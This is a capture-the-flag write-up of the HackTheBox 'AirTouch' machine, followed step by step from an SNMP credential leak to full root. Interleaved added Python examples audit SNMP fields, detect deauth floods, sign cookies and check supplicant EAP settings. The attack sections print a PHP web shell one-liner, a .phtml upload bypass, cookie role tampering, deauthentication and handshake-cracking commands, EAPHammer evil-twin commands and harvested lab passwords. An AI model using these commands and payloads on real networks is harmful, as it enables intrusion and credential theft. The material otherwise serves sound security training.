TARGET OS: LINUX / HYBRID | AUTHOR: LEANDROS
AirTouch is a massive, real-world hybrid infrastructure simulation on HackTheBox. The intrusion required compromising multiple isolated network segments. I began by exploiting a leaky SNMP service to gain initial SSH access. From there, I escalated to a local root container, enabling me to capture and crack a WPA2-PSK WiFi handshake. After pivoting into the internal network using a Chisel SOCKS proxy, I performed a PCAP analysis to hijack an admin cookie. This led to a web shell and further lateral movement. Finally, I executed a sophisticated Rogue Access Point (Evil Twin) attack against a WPA2-Enterprise network using EAPHammer, cracking the captured MSCHAPv2 hashes to secure full administrative control over the central RADIUS host. Here is my complete mission log.
I initiated the engagement with standard TCP and UDP Nmap scans to map the target's external attack surface.
nmap -sCV -p22 <IP>
nmap -sU --top-ports 100 -v <IP>
PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open snmp
While TCP only revealed SSH, the UDP scan exposed port 161 (SNMP). Simple Network Management Protocol is used to monitor network devices, but if it is reachable with a default community string such as public, it discloses a large amount of system information to anyone who can query it. I used snmp-check to dump the Management Information Base (MIB) tree.
snmp-check <IP>
[*] System information:
Host IP address : 10.129.9.137
Hostname : Consultant
Description : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
The administrators explicitly stored a plaintext password in the device description field: RxBlZhLmOkacNWScmZ6D. I used this password to SSH into the machine as the consultant user. Running sudo -l revealed I had NOPASSWD: ALL permissions, allowing me to instantly execute sudo su and become root! However, I quickly realized I was trapped inside an isolated container. I needed to pivot.
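A defender's counterpart to this step, added here as an example and not part of the original writeup: a small Python audit that takes the MIB-II system-group values an SNMP query returns, flags any free-text field that looks like it carries a credential, and checks a community string against a list of well-known defaults. The sample values, the placeholder password and the DEFAULT_COMMUNITIES list are constructed for this example.

```python
import re
from typing import Dict, List

# Well-known default community strings; read access granted to any of these is a
# finding in itself. (Constructed list for this example; extend as needed.)
DEFAULT_COMMUNITIES = {"public", "private", "manager", "admin", "cisco", "community"}

# Regexes for secrets written into free-text MIB fields, matched case-insensitively.
# Each pattern requires a separator ("is", ":" or "=") so that phrases such as
# "password policy" do not trigger.
CREDENTIAL_PATTERNS = [
    (r"\bpass(?:word|wd|phrase)?\b\s*(?:is\s*[:=]?|[:=])\s*\S+", "password in free-text field"),
    (r"\b(?:secret|token|api[_ -]?key)\b\s*(?:is\s*[:=]?|[:=])\s*\S+", "secret/token in free-text field"),
    (r"\b(?:user(?:name)?|login)\b\s*[:=]\s*\S+", "username in free-text field"),
]

# Constructed sample: the sysDescr/sysContact/sysLocation/sysName values a
# read-only SNMP query might return. The password is a made-up placeholder.
SAMPLE_SYSTEM_INFO = {
    "sysDescr": "The default consultant password is: NotARealSecret123 (change it after use it)",
    "sysContact": "netops@example.test",
    "sysLocation": "Rack 4, row B",
    "sysName": "Consultant",
}


def community_is_weak(community: str) -> bool:
    """True when the community string is empty or a well-known default."""
    name = community.strip().lower()
    return not name or name in DEFAULT_COMMUNITIES


def find_credential_leaks(system_info: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one finding per MIB field whose value looks like it carries a credential."""
    findings = []
    for field, value in system_info.items():
        for pattern, reason in CREDENTIAL_PATTERNS:
            match = re.search(pattern, value, re.IGNORECASE)
            if match:
                findings.append({"field": field, "reason": reason, "match": match.group(0)})
                break  # one finding per field is enough for triage
    return findings


if __name__ == "__main__":
    for finding in find_credential_leaks(SAMPLE_SYSTEM_INFO):
        print(f"[!] {finding['field']}: {finding['reason']} -> {finding['match']}")
    print("community 'public' is weak:", community_is_weak("public"))
```

Run this against the output of an authorised snmpwalk of your own estate; a hit in sysDescr or sysContact means the fix is twofold: scrub the text from the device, and move the agent to SNMPv3 with authentication and privacy enabled (or at least a non-default, ACL-restricted community).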
While exploring the container as root, I noticed wireless auditing tools like aircrack-ng were installed, and a wireless interface (wlan0) was available. This machine was acting as a WiFi client/monitor!
In WPA2-PSK networks, the passphrase itself is never sent over the air. Instead, the client and the access point derive the session keys from it during the 4-Way Handshake (EAPOL). By putting the wireless card into monitor mode, forcing connected clients to reconnect (deauthentication) and capturing the handshake they perform, we obtain the nonces and MIC needed to verify candidate passphrases offline, so a weak passphrase falls to a dictionary attack.
I put the interface into monitor mode and used airodump-ng to discover a target network: AirTouch-Internet (BSSID: F0:9F:C2:A3:F1:A7). I targeted this network and used aireplay-ng to force client disconnections, successfully capturing the WPA handshake.
airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w airtouch_capture wlan0mon
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0mon
With the .cap file generated, I downloaded the rockyou.txt wordlist to the container and ran aircrack-ng against the capture file. It successfully cracked the hash, revealing the WiFi password: challenge.
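The deauthentication burst that produced this handshake is loud on the air, and it is the event a wireless IDS should alert on. Below is an added Python example (not from the original writeup) of that detection: a sliding-window counter over management-frame records that raises an alert when one sender emits a burst of deauth/disassoc frames. The frame records are constructed for the example; AP_BSSID is the BSSID quoted above, CLIENT_MAC is a made-up locally administered address, and the window and threshold values are illustrative defaults.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple

# A frame record as a monitor-mode sensor might log it:
# (timestamp in seconds, management subtype, source MAC, BSSID).
Frame = Tuple[float, str, str, str]

# Management subtypes that tear down a client's association.
DISCONNECT_SUBTYPES = {"deauth", "disassoc"}

AP_BSSID = "F0:9F:C2:A3:F1:A7"      # BSSID from the writeup
CLIENT_MAC = "02:00:00:00:00:01"    # constructed, locally administered address

# Constructed sample traffic: a few beacons, a burst of ten deauthentication
# frames whose source is spoofed as the AP itself (what a "-0 10" style flood
# looks like on the air), and one ordinary single disconnect from a client.
SAMPLE_FRAMES: List[Frame] = [(i * 0.1, "beacon", AP_BSSID, AP_BSSID) for i in range(3)]
SAMPLE_FRAMES += [(1.0 + i * 0.05, "deauth", AP_BSSID, AP_BSSID) for i in range(10)]
SAMPLE_FRAMES += [(5.0, "deauth", CLIENT_MAC, AP_BSSID)]
SAMPLE_FRAMES.sort()


def detect_deauth_floods(frames: List[Frame], window_s: float = 1.0, threshold: int = 5) -> List[Dict]:
    """Alert once per source MAC that sends >= threshold deauth/disassoc frames within window_s.

    frames must be ordered by timestamp (the sample above is sorted).
    """
    recent: Dict[str, Deque[float]] = defaultdict(deque)
    alerted = set()
    alerts: List[Dict] = []
    for ts, subtype, src, bssid in frames:
        if subtype not in DISCONNECT_SUBTYPES:
            continue
        window = recent[src]
        window.append(ts)
        # Drop timestamps that have fallen out of the sliding window.
        while window and ts - window[0] > window_s:
            window.popleft()
        if len(window) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({
                "source": src,
                "bssid": bssid,
                "count": len(window),
                "first_seen": window[0],
                "last_seen": ts,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"[!] deauth flood from {alert['source']} against {alert['bssid']}: "
              f"{alert['count']} frames between t={alert['first_seen']} and t={alert['last_seen']}")
```

Detection is the fallback; the structural fix is 802.11w Protected Management Frames (mandatory in WPA3, optional in WPA2), which makes clients discard unauthenticated deauthentication frames so a spoofed burst no longer forces a fresh handshake.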
I generated a wpa_supplicant configuration file, connected to the network via the wlan1 interface, and requested an IP address via DHCP, placing me inside the 192.168.3.0/24 subnet.
wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/wifi.conf
wpa_supplicant -i wlan1 -c /tmp/wifi.conf -B
dhclient -v wlan1
Now on the internal WiFi network, I used a Chisel SOCKS proxy to route my attacker machine's traffic into the subnet. Scanning the gateway (192.168.3.1) revealed an HTTP login panel.
Instead of brute-forcing the panel, I went back to my airodump-ng capture file. Since I now had the plaintext WiFi password, I could use airdecap-ng to decrypt the raw wireless frames and analyze the internal HTTP traffic!
airdecap-ng -e "AirTouch-Internet" -p "challenge" captura-01.cap
I opened the decrypted PCAP in Wireshark, followed the HTTP streams, and found a cleartext session cookie for an authenticated user. I intercepted my browser request, injected the stolen cookie, and bypassed the login page.
By manually altering the role parameter in the cookie to admin, I unlocked a hidden file upload feature. The server blocked .php files, but it allowed .phtml extensions!
<?php echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; ?>
I uploaded the webshell and used it to read the login.php source code (/uploads/shell1.phtml?cmd=cat ../login.php). The source code contained hardcoded credentials: user : JunDRDZKHDnpkpDDvay. I SSH'd into the gateway (192.168.3.1) as this user. Checking sudo -l revealed I was root in yet another container!
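Two application defects carried this stage: the server trusted a role field the client could edit, and the upload filter blocked .php while leaving .phtml executable. The following Python is an added example, not code from the original writeup or the target application, showing each weak pattern next to its hardened form: an unsigned cookie versus an HMAC-signed one that rejects a rebuilt body, and an extension blocklist versus an allowlist that also refuses double extensions. SERVER_SECRET and the cookie layout are hypothetical.

```python
import base64
import hashlib
import hmac
import json
import os
from typing import Optional

# Hypothetical server-side key; a real deployment loads it from a secret store.
SERVER_SECRET = b"example-secret-do-not-reuse"


# --- Weak pattern from the writeup: role taken straight from an unsigned cookie ---
def role_from_unsigned_cookie(cookie_header: str) -> str:
    """Parse 'k=v; k2=v2' and trust whatever role the client sent."""
    fields = dict(kv.strip().split("=", 1) for kv in cookie_header.split(";") if "=" in kv)
    return fields.get("role", "user")


# --- Hardened pattern: HMAC-signed cookie, verified before any field is trusted ---
def _encode(payload: dict) -> str:
    return base64.urlsafe_b64encode(json.dumps(payload, sort_keys=True).encode()).decode()


def sign_cookie(payload: dict) -> str:
    body = _encode(payload)
    mac = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{mac}"


def verify_cookie(cookie: str) -> Optional[dict]:
    """Return the payload only if the MAC matches; None for tampered or malformed cookies."""
    body, sep, mac = cookie.rpartition(".")
    if not sep or not body:
        return None
    expected = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected.encode(), mac.encode()):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except ValueError:  # covers bad base64 and bad JSON
        return None


def forge_role(signed_cookie: str, new_role: str) -> str:
    """Rebuild the body with a different role but keep the old MAC (what an edited cookie looks like)."""
    body, _, mac = signed_cookie.rpartition(".")
    payload = json.loads(base64.urlsafe_b64decode(body))
    payload["role"] = new_role
    return f"{_encode(payload)}.{mac}"


# --- Upload filtering: blocklist (what the server did) versus allowlist ---
PHP_BLOCKLIST = {".php"}
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def blocklist_allows(filename: str) -> bool:
    """Rejects only '.php'; other extensions the PHP handler serves (.phtml, .phar) slip through."""
    return os.path.splitext(filename)[1].lower() not in PHP_BLOCKLIST


def allowlist_allows(filename: str) -> bool:
    """Accept a short list of extensions and exactly one dot, so double extensions fail."""
    name = os.path.basename(filename)
    root, ext = os.path.splitext(name)
    return bool(root) and name.count(".") == 1 and ext.lower() in ALLOWED_UPLOAD_EXT
```

Signing the cookie fixes the role edit but not the theft that preceded it: the session was lifted from cleartext HTTP, so the cookie also needs the Secure and HttpOnly flags and a TLS-only site. For uploads, the allowlist should be paired with storing files under a directory the web server never hands to the PHP interpreter.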
In the root directory of this second container, I found a script named send_certs.sh that contained credentials for the user remote (xGgWEwqUpfoOVsLeROeG) and used them to connect to 10.10.10.1.
Scanning the wireless environment again with iwlist revealed a new 5GHz network: AirTouch-Office. Unlike the previous network, this one used WPA2-Enterprise (802.1X) authentication.
WPA2-Enterprise does not use a single shared password. Each user authenticates individually against a RADIUS server, usually via PEAP-MSCHAPv2, so there is no pre-shared-key handshake to capture and crack offline. Instead, we must perform an "Evil Twin" attack using a tool like EAPHammer. By spinning up a fake access point with the exact same SSID and presenting the network's own server certificates (which we found on the compromised system), we can trick corporate devices into connecting to us. When they attempt to log in, our fake AP captures their MSCHAPv2 challenge-response hashes, which can then be cracked offline.
I extracted the necessary ca.crt, server.crt, and server.key files from the compromised host and imported them into the eaphammer tool.
./eaphammer --cert-wizard import --ca-cert /root/certs1/ca.crt --server-cert /root/certs1/server.crt --private-key /root/certs1/server.key
I then launched the Evil Twin attack, cloning the AirTouch-Office network.
./eaphammer -i wlan2 --bssid AC:8B:A9:F3:A1:13 --essid "AirTouch-Office" --channel 44 --auth wpa-eap --creds
Almost immediately, an automated client attempted to connect to my rogue access point. EAPHammer captured the NETNTLM hash for the user r4ulcl! I saved the hash and passed it to John the Ripper.
john --format=netntlm hash --wordlist=rockyou.txt
John rapidly cracked the hash, revealing the password: laboratory.
With a valid set of enterprise credentials, I crafted a custom wpa_supplicant config to connect to the real AirTouch-Office network, specifying PEAP and MSCHAPV2 authentication. Once connected, I received an IP address (10.10.10.74).
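The reason the rogue AP worked is worth making concrete from the client side. The Python below is an added example, not part of the original writeup, that parses two wpa_supplicant network blocks and audits the EAP settings that decide whether a client will talk to an impostor RADIUS server: a weak block with no certificate validation, and a hardened one with ca_cert, domain_match and an anonymous outer identity. Both blocks are constructed; the identity, password, certificate path and server name in them are placeholders. In this engagement the attacker held the real server certificate and key, so certificate checks alone would not have stopped it; the audit's findings are the settings that close the gap for every other rogue AP, and the key compromise itself calls for rotating the RADIUS certificate.

```python
from typing import Dict, List, Tuple

# Two constructed wpa_supplicant network blocks. Identity, password, paths and
# the RADIUS server name are placeholders for this example.
WEAK_CONFIG = """
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="example-password"
    phase2="auth=MSCHAPV2"
}
"""

HARDENED_CONFIG = """
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@corp.example"   # outer identity only
    identity="alice"
    password="example-password"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"   # hypothetical path
    domain_match="radius.corp.example"            # hypothetical server name
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}
"""


def parse_network_blocks(text: str) -> List[Dict[str, str]]:
    """Minimal parser for network={ key=value ... } blocks; strips quotes and # comments.

    Note: a '#' inside a quoted password would be treated as a comment by this parser.
    """
    blocks: List[Dict[str, str]] = []
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("network={"):
            current = {}
        elif line == "}" and current is not None:
            blocks.append(current)
            current = None
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip().strip('"')
    return blocks


def audit_network(block: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (severity, message) findings for an EAP network block."""
    findings: List[Tuple[str, str]] = []
    if "EAP" not in block.get("key_mgmt", "").upper():
        return findings  # PSK/open networks: nothing to check here
    if not (block.get("ca_cert") or block.get("ca_path")):
        findings.append(("high", "no ca_cert/ca_path: server certificate is not validated, any AP can pose as the RADIUS server"))
    if not any(k in block for k in ("domain_match", "domain_suffix_match", "subject_match", "altsubject_match")):
        findings.append(("high", "no server-name check (domain_match etc.): any certificate from a trusted CA is accepted"))
    if block.get("password") and not block.get("anonymous_identity"):
        findings.append(("low", "no anonymous_identity: the real username is sent unencrypted in the outer EAP-Identity"))
    if "MSCHAPV2" in block.get("phase2", "").upper():
        findings.append(("info", "inner MSCHAPv2: if the TLS tunnel ends at an attacker, the response is crackable offline; prefer EAP-TLS"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        for block in parse_network_blocks(text):
            print(f"[{label}] ssid={block.get('ssid')}")
            for severity, message in audit_network(block):
                print(f"  {severity:5s} {message}")
```

The same checks apply to managed Windows and macOS supplicant profiles, where the equivalents are the trusted root CA and the server-name list; a profile that lets the user "accept" an unknown certificate is the weak block above in another syntax.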
From inside this highly restricted network segment, I utilized the SSH credentials I found earlier to log into the main RADIUS/Host AP server (10.10.10.1) as the user remote.
cat /etc/hostapd/hostapd_wpe.eap_user
# WPE - DO NOT REMOVE - These entries are specifically in here
* PEAP,TTLS,TLS,FAST
"AirTouch\r4ulcl" MSCHAPV2 "laboratory" [2]
"admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
Because this server was previously acting as a HostAPD-WPE (Wireless Pwnage Edition) node, it was logging all authenticated user credentials in absolute plaintext! I extracted the password for the admin user: xMJpzXt4D9ouMuL3JJsMriF7KZozm7.
I used su admin to switch to the admin user. Checking my privileges with sudo -l, I discovered I possessed full, unrestricted NOPASSWD: ALL rights on the primary host.
sudo su
whoami
root
I was dropped into a root shell on the central management node. I retrieved the final root.txt flag, bringing the entire hybrid infrastructure to its knees. System Compromised.